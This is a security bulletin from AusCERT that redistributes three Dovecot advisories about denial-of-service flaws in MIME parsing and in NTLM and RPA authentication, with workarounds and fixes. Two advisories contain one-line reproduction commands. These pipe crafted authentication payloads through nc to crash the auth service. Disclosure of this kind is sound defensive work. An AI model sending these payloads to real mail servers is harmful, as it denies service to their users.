-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2020.2808
Dovecot v2.3.11.3 fixes three vulnerabilities
14 August 2020
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Dovecot
Publisher: Dovecot
Operating System: UNIX variants (UNIX, Linux, OSX)
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2020-12674 CVE-2020-12673 CVE-2020-12100
Reference: ESB-2020.2790
Original Bulletin:
https://dovecot.org/pipermail/dovecot-news/2020-August/000441.html
https://dovecot.org/pipermail/dovecot-news/2020-August/000442.html
https://dovecot.org/pipermail/dovecot-news/2020-August/000443.html
Comment: This bulletin contains three (3) Dovecot security advisories.
- --------------------------BEGIN INCLUDED TEXT--------------------
[Dovecot-news] CVE-2020-12100: Receiving mail with deeply nested MIME parts
leads to resource exhaustion.
Open-Xchange Security Advisory 2020-08-12
Affected product: Dovecot IMAP server
Internal reference: DOP-1849 (Bug ID)
Vulnerability type: Uncontrolled recursion (CWE-674)
Vulnerable version: 2.0
Vulnerable component: submission, lmtp, lda
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-04-23
CVE reference: CVE-2020-12100
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Receiving mail with deeply nested MIME parts leads to resource
exhaustion as Dovecot attempts to
parse it.
Risk:
Malicious actor can cause denial of service to mail delivery by
repeatedly sending mails with bad
content.
Workaround:
Limit MIME structures in MTA.
Solution:
Upgrade to fixed version.
Best regards,
Aki Tuomi
Open-Xchange oy
- --------------------------------------------------------------------------------
[Dovecot-news] CVE-2020-12673: Specially crafted NTML package can crash auth
service
Open-Xchange Security Advisory 2020-08-12
Affected product: Dovecot IMAP server
Internal reference: DOP-1870 (Bug ID)
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer
size, which leads to reading past allocation which can lead to crash.
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH NTLM'; echo -ne
'NTLMSSPx00x01x00x00x00x00x02x00x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
|
base64 -w0 ;echo ;echo -ne
'NTLMSSPx00x03x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00AAx00x00x41x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00orangex00'|
base64 -w0;echo ; echo QUIT) | nc 127.0.0.1 110
Workaround:
Disable NTLM authentication.
Solution:
Upgrade to fixed version.
Best regards,
Aki Tuomi
Open-Xchange oy
- --------------------------------------------------------------------------------
[Dovecot-news] CVE-2020-12674: Specially crafted RPA authentication message
crashes auth
Open-Xchange Security Advisory 2020-08-12
Affected product: Dovecot IMAP server
Internal reference: DOP-1869 (Bug ID)
Vulnerability type: CWE-126 (Buffer over-read)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
Researcher credit: Orange from DEVCORE team
CVE reference: CVE-2020-12674
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's RPA mechanism implementation accepts zero-length message,
which leads to assert-crash later on
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH RPA'; echo -ne
'x60x11x06x09x60x86x48x01x86xf8x73x01x01x01x00x04x00x00x01'
| base64 -w 0; echo ; echo -ne
'x60x11x06x09x60x86x48x01x86xf8x73x01x01x00x03A at Ax00' |
base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
Workaround:
Disable RPA authentication.
Solution:
Upgrade to fixed version.
Best regards,
Aki Tuomi
Open-Xchange oy
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBXzX0QuNLKJtyKPYoAQiFSQ//eg8y0WYR9fR0DF+R+GmC6CTZ34usA4PA
sdeUImD3XU96QS/xicR4BGqL4WKbg5BfIr3lrlI4sKxp+iBd+OOXUbkUiT183tpA
5ws3MHT1r4f/Bz0Vx1cXSg0TrzSwWEau/2Xbw4CcYRnsOlInU4KW12fAFqGkWtds
aeuQU7ZIT1uN9S0dgP4djif4AUlkpDUWOQOVb6i3Z4PEgAg3P7hM1gPFe6GPJC5y
SHktVU6B98JzrxgL2H1KmRJTBh3jjY9bs0ihoI2W6HOuFWKOWcYYxaPLkUBsK3QU
uLaWOsQhnoNt+MtWQ78elvQ62lEXwqjf3A//Iyv3G2YcTei7eibBo5qtY3eNhBiz
AAhw9+9N+zYk4mRQM+DrEBfIEyVnYC8JWdlIw361WIwEn/VQduWqBRTpJeZAKiqH
898QFbefgsPkkuFeBX0QOU/4GkN+Qr55IfCbyuy4+Joh2NlN6WQMzYrpVO8HA2L2
DxJxg7rlCzdqf5a+amWUR66zmJxnEADBrdW3DVcaCgbpfmPhq1nP1vWfcO7VwsGY
i+JKguX5ga/djiEETUsIyPFeicUnZjJzDUMKrzRGooPJZmx5Rhb416EAg22IvdAq
gaPlhQ88LkrD7X1lUF5NrxasFDekP8gj6N2hPtfeycaPchdEfL2pLNrmAsOsS0oY
MHKMHFrhOjM=
=E+4T
-----END PGP SIGNATURE-----
https://www.malwaredevil.com/2020/08/14/esb-2020-2808-unix-linux-dovecot-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-2808-unix-linux-dovecot-denial-of-service-remote-unauthenticated
No comments:
Post a Comment